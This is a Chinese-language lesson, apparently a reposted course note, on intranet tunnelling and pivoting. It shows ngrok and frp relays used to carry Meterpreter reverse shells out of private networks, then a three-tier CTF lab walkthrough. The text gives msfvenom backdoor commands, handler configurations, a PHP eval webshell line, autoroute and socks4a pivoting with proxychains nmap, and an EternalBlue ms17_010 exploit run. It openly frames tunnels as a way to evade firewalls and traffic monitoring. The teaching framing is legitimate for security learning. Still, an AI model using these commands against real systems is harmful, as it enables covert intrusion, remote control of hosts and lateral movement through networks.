? ? ? ? ?
這節(jié)課解決代理的問題,
他是內(nèi)網(wǎng)里面的穿透技術(shù),隧道主要安全設(shè)備和流量監(jiān)控的攔截問題,我們在做滲透的時候需要回顯數(shù)據(jù)或者一些重要的信息,走的協(xié)議不一樣,tcp/ip有七層,
在不同層里面有不同的協(xié)議,有一些協(xié)議會受到防火墻,過濾設(shè)備和流量檢測工具的干擾,在內(nèi)網(wǎng)回顯數(shù)據(jù)和拖數(shù)據(jù)的會出現(xiàn)一些攔截和告警,隧道技術(shù)主要就是解決這個事情;
兩個肉雞都在內(nèi)網(wǎng),就必須借助代理才能實現(xiàn),代理利用工具比較知名的比如,frp,ngrok,ew,不過ew已經(jīng)停止更新了,以后就用不到了,
代理主要結(jié)局的問題,內(nèi)網(wǎng)里面的主機有外網(wǎng);內(nèi)網(wǎng)里面有過濾;內(nèi)網(wǎng)里面外網(wǎng),單純一個主機服務(wù)器沒有網(wǎng)絡(luò);
必要知識點;
內(nèi)外網(wǎng)絡(luò)劃分,
IPv4地址設(shè)計時保留了一部分作為私有地址,它們不會被當(dāng)作共有地址分配出去,而是只在局域網(wǎng)內(nèi)使用
地址段 ???????????????????????????掩碼
10.x.x.x ?????????????????????????255.0.0.0
172.16.x.x-172.31.x.x????255.240.0.0
192.168.x.x ???????????????????255.255.0.0?
內(nèi)網(wǎng)一和內(nèi)網(wǎng)二通信問題;
主機一在內(nèi)網(wǎng)一這里,主機二就在內(nèi)網(wǎng)二這里,就好比宿舍的上網(wǎng)和工作室上網(wǎng),雖然都在內(nèi)網(wǎng)里面但不是一個內(nèi)網(wǎng),這兩個要實現(xiàn)通訊,比如主機一msf生成一個后門,然后發(fā)給主機二,讓主機二上線,是上不了線的,因為都是內(nèi)網(wǎng),除非使用代理技術(shù);
正向反向協(xié)議通信連接問題
正向就是我去鏈接肉雞,反向就是肉雞主動聯(lián)系我,
內(nèi)網(wǎng)穿透代理隧道技術(shù)說明
隧道主要就是解決防火墻,流量監(jiān)控工具的攔截,代理解決網(wǎng)絡(luò)連通性問題
案例一內(nèi)網(wǎng)穿透Ngrok測試演示-兩個內(nèi)網(wǎng)通訊上線
拓撲圖;我們用的是自己的內(nèi)網(wǎng)的虛擬機kali,生成后門,想控制這臺肉雞,理論上不涉及代理是一定控制不了的,因為兩者都是內(nèi)網(wǎng),生成后門的時候如果寫的是外面地址,肉雞連接到時候就找到的路由器,如果寫的內(nèi)網(wǎng)ip,那肉雞根本就找不到,
這就要借助ngrok來實現(xiàn)聯(lián)通;
在使用ngrok的他會在外網(wǎng)啟用一臺服務(wù)器,就會,肉雞在找黑客的時候,肉雞會先找到服務(wù)器,服務(wù)器在傳輸給黑客的主機;這個工具就是在外網(wǎng)加設(shè)一臺服務(wù)器,這個外網(wǎng)服務(wù)器,黑客和肉雞都可以訪問,
內(nèi)網(wǎng)穿透Ngrok測試演示-兩個內(nèi)網(wǎng)通訊上線
http://www.ngrok.cc/
實驗環(huán)境:兩個不同的內(nèi)網(wǎng)(有網(wǎng)絡(luò))實現(xiàn)穿透控制
1.注冊-購買-填寫-確認(rèn)
注冊賬號,根據(jù)操作系統(tǒng)選擇對應(yīng)的客戶端
不會使用可以看使用教程
選“開通隧道”,根據(jù)需要購買服務(wù)器
隧道協(xié)議選擇后門要使用的協(xié)議,注意一下;隨便寫一個名稱和域名
本地端口是攻擊機的地址端口??梢韵入S便寫,后面可以改
如果希望隧道有驗證身份的用戶名和密碼可以填寫驗證用戶名和驗證密碼?
配置好之后在來到隧道代理
攻擊機要安裝Ngrok,被攻擊機只需要正常啟動 ,然后先來到下載,復(fù)制到攻擊機,來到它這個目錄
,
運行它,在clinetid后門跟上id
開啟成功后,別人訪問這個http的王子,就會指向后面的ip,后面的ip就是黑客主機ip。
現(xiàn)在就可以用msf生成一個后門
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
這里選擇的協(xié)議要和建立代理的時候?qū)?yīng),都是http,后門的后門地址就是我們代理的網(wǎng)址,端口也是代理的端口,反彈的shell也會在反彈到代理上面,所有東西就會傳輸?shù)酱砩厦?,代理在傳輸給本機。
然后把生成的后門上傳到肉雞上面
之后在本機上面配置好信息,因為開了代理,所有的流量都會執(zhí)行本機ip的4444端口,所以監(jiān)聽ip和端口設(shè)置跟代理傳輸?shù)膇p和端口一致就行
use exploit/multi/handler
????set payload windows/meterpreter/reverse_http
????set lhost 192.168.76.132
????set lport 4444
????Exploit?
接收到數(shù)據(jù)了,代理也成功傳輸數(shù)據(jù)、
案例二內(nèi)網(wǎng)穿透Frp自建跳板測試-兩個內(nèi)網(wǎng)通訊上線?
目前最主流的工具,用到frp就要自己準(zhǔn)備一臺服務(wù)器,
自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務(wù)端-下載-解壓-修改-啟動(阿里云主機記得修改安全組配置出入口)?
下載好之后的所有文件
frpc.ini;這個c結(jié)尾的就是客戶端,frps.ini;這個是代表server服務(wù)端,在本機上上就只要修改frpc.ini
控制端修改配置文件frpc.ini:
[common]
server_addr = 外網(wǎng)服務(wù)器ip
server_port = 6677?????????#frpc工作端口,必須和frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1? 本機ip即可
local_port = 5555????????????#轉(zhuǎn)發(fā)給本機的5555端口
remote_port = 6000????????#服務(wù)端用6000端口轉(zhuǎn)發(fā)給本機?
服務(wù)器修改配置文件frps.ini:
[common]
bind_port = 6677????????????#frps工作端口,必須和frpc保持一致
啟動服務(wù)端:
????????./frps -c ./frps.ini?
啟動客戶端
然后在服務(wù)端就成功受到了端口就鏈接
生成后門
????msfvenom -p windows/meterpreter/reverse_tcp lhost=[服務(wù)端IP地址]?lport=6000 -f exe -o frp.exe?
把木馬上傳到肉雞上面去執(zhí)行
監(jiān)聽后門
????use exploit/multi/handler
????set payload windows/meterpreter/reverse_tcp
????set LHOST 127.0.0.1
????set LPORT 5555
????exploit?
沒有問題,管你在那個內(nèi)網(wǎng),老子直接穿透你,
案例三CFS三層內(nèi)網(wǎng)漫游安全測試演練-某CTF線下2019?
內(nèi)網(wǎng)環(huán)境拓撲圖
這個題目在每一臺主機里面都有一個flag,這個題目一看就涉及到代理知識,不做跳板沒有辦法進行下去;
第一個靶機
選擇只有那臺外網(wǎng)主機是本機可以訪問到的,實際上情況下就需要端口掃描一下找到,
5.0直接用thinkphp滲透工具直接秒他就行了
命令執(zhí)行成功,直接寫入一個webshell到網(wǎng)站目錄
echo '<?php eval($_POST[x]);?>'> >/www/wwwroot/ThinkPHP/public/2.php?
然后直接用蟻劍鏈接上線,滲透第一個肉雞,
第一個flag值拿下
第二個靶機
探針目標(biāo)-利用WEB漏洞(TP5_RCE)-獲取webshell權(quán)限-獲取Flag-Target2
0.端口掃描,發(fā)現(xiàn)目標(biāo)主機。發(fā)現(xiàn)ThinkPHPv5框架,使用對應(yīng)的exp寫入后門?
第二個肉雞有22和33兩個網(wǎng)段,本機連接不了22端口,就必須借助第一個肉雞才能鏈接,用第一臺肉雞去鏈接第二個靶機
1.生成后門:
????msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf?
先開啟監(jiān)聽狀態(tài)
然后通過蟻劍把我們的生成后門上傳到第一個肉雞上命來,之后打開虛擬終端直接執(zhí)行后門
接收到了反彈shell
接下來該如何讓這個kali可以分為22網(wǎng)段呢,就是第二臺靶機,在msf有自帶的代理加持,
3.信息收集及配置訪問
探索內(nèi)網(wǎng)并添加路由,從而發(fā)現(xiàn)和聯(lián)系上內(nèi)網(wǎng)
獲取網(wǎng)絡(luò)接口:run get_local_subnets
先通過網(wǎng)絡(luò)接口來判斷,在實戰(zhàn)情況下,我們是不會知道第二胎靶機的網(wǎng)絡(luò)的,前期就要進行信息收集,就用到這條命令獲取網(wǎng)卡信息,
就可以看到有兩個網(wǎng)卡,22網(wǎng)卡就是內(nèi)網(wǎng)鏈接的,知道了網(wǎng)卡之后,但是不能訪問,這時候就要查看路由,建立路由規(guī)則,
查看路由地址:run autoroute -p
空的沒有路由
添加路由地址:run autoroute -s 192.168.22.0/24?
再查看路由,就多了一個路由地址
?然后路由哪里表示了給s1,剛剛反彈的shell是s1的,就是在s1上面多了這個路由,s1上命就有了22網(wǎng)卡,就相當(dāng)于添加了一個網(wǎng)絡(luò)接口,由于是建立到s1,所以就是建立在肉雞一上面的,所以添加路由能成功的原因,就在于是靶機一上面。
通訊成功了接下來就是攻擊,但是這個通訊有點問題,只有在msf能進行通訊,因為路由是寫在msf上面,有一些工具不享有路由規(guī)則,就無法訪問
就只能在msf會話上面攻擊,這時候就需要在本地開一個代理,這個代理就相當(dāng)于,給其他人一個接口,人其他工具去訪問這個接口,在kali上面開一個2222端口,我就可以通過我本機訪問kali的2222端口,本機鏈接kali就能訪問靶機一,而靶機一又可以訪問靶機二,本機和靶機二就通了。
開啟本地代理:
????use auxiliary/server/socks4a
????set srvport 2222
????exploit?
4.利用本地代理接口訪問測試
linux:
接下來就要用到一個工具proxychains,
配置proxychains后調(diào)用工具探針Target2
/etc/proxychains.conf
????socks4 192.168.76.132 2222
????proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 ;接下來用這個工具,調(diào)用nmap掃描22這個網(wǎng)段的時候,就會走192.168.76.132: 2222這個端口,就會享有msf配置的22端口路由,
-Pn:不使用ping掃描,不執(zhí)行主機發(fā)現(xiàn),默認(rèn)目標(biāo)主機是存活的,可以繞開防火墻。
-sT:使用TCP連接,與目標(biāo)三次握手,來確定端口是否開放
開始namp掃描
直接掃(target2的網(wǎng)站)192.168.22.129:
然后掃描出來
然后我們直接訪問這個網(wǎng)站是訪問不到的,就可以在瀏覽器哪里開一個代理,在收到配置代理的時候就有一個sosks v4的選項,就是我們本機開的代理+
就能訪問靶機二的web界面
由于是ctf在源代碼里面會有一些線索
給了一個注入點,
sqlmap和手工注入都可以,注入找到賬號密碼
就要開始登陸他的后臺,然后一般網(wǎng)站為了防止爬蟲會把敏感目錄寫道一個rebots文件,剛好這個就用,還有敏感目錄
登錄后臺
flag就拿到了,但這里是后臺做不了代理,通過后臺一些功能拿webshell
根據(jù)網(wǎng)站的路由規(guī)則訪問這個文件:
http://192.168.22.128/index.php?r=special?
寫一個后門,拿下webshell,但是我們怎么去鏈接他也是個問題,不過蟻劍有代理功能,就可以鏈接了
拿下webshell,
這里還有一個方法,在windows下可以裝個Proxifier ,這是一個全局代理工具,
下面所有應(yīng)用程序都會走這個代理
在windows下可以裝個SocksCap64
給指定程序開啟代理
然后點在代理種運行,這個是避免上面全局代理不支持的軟件,這個全都支持
然后為了拿下第三臺靶機,又要在第二臺肉雞上做操作
這里要在msf生成一個正向后門,這里為什么要做正向代理,因為第二胎肉雞,他沒有76網(wǎng)段,只有22和33網(wǎng)段,寫成反向代理,第二臺肉雞找不到kali;但是kali已經(jīng)按到了第一臺肉雞的權(quán)限啊,有他shell在,還添加了22的路由,在第二臺肉雞可以添加路由嗎?不可能,路由只能在是讓肉雞上線才能操作,這上線都沒有上線,操作個雞毛,所以只能kali自己去鏈接第二臺肉雞
1.生成正向后門:
????msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf?
bind綁定,這個后門會綁定在他本地的3333端口,
生成后門文件之后之后,利用蟻劍把后門文件上傳到第二臺肉雞,
2.訪問接受:
????use exploit/multi/handler
????set payload linux/x64/meterpreter/bind_tcp
????set rhost 192.168.22.128
????set LPORT 3333
????exploit?
開啟監(jiān)聽
用蟻劍執(zhí)行后門文件
第三臺肉雞
就拿到了反彈shell,添加33網(wǎng)段路由
然后就是和上面一樣的操作,在在本地開一個代理,讓別人軟件可以通過這個代理去訪問第三胎肉雞的33網(wǎng)段上面的東西,
漏洞利用,找到flag
????proxychains4 nmap -Pn -sT 192.168.33.33
利用本地代理執(zhí)行nmap掃描,加上參數(shù)--script=all? 掃描windows的系統(tǒng)漏洞
掃出來一個ms17010,永恒之藍漏洞
????use exploit/windows/smb/ms17_010_psexec
????set payload windows/meterpreter/bind_tcp
因為第三臺肉雞無法主動找我,只能我去找他,所以paylaod還是綁定
????set RHOST 192.168.33.33
設(shè)置肉雞的ip
????exploit
這里老師鏈接上了本地代理,別的東西都通過本地代理訪問的第三臺肉雞,設(shè)置好本地代理才能繼續(xù)下去,拿下第三個肉雞
????dir /S flag.txt /B
????type xxxxx.txt?
完成
? ?
fa文章來源:http://www.zghlxwxcb.cn/news/detail-776744.html
cai文章來源地址http://www.zghlxwxcb.cn/news/detail-776744.html
到了這里,關(guān)于70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!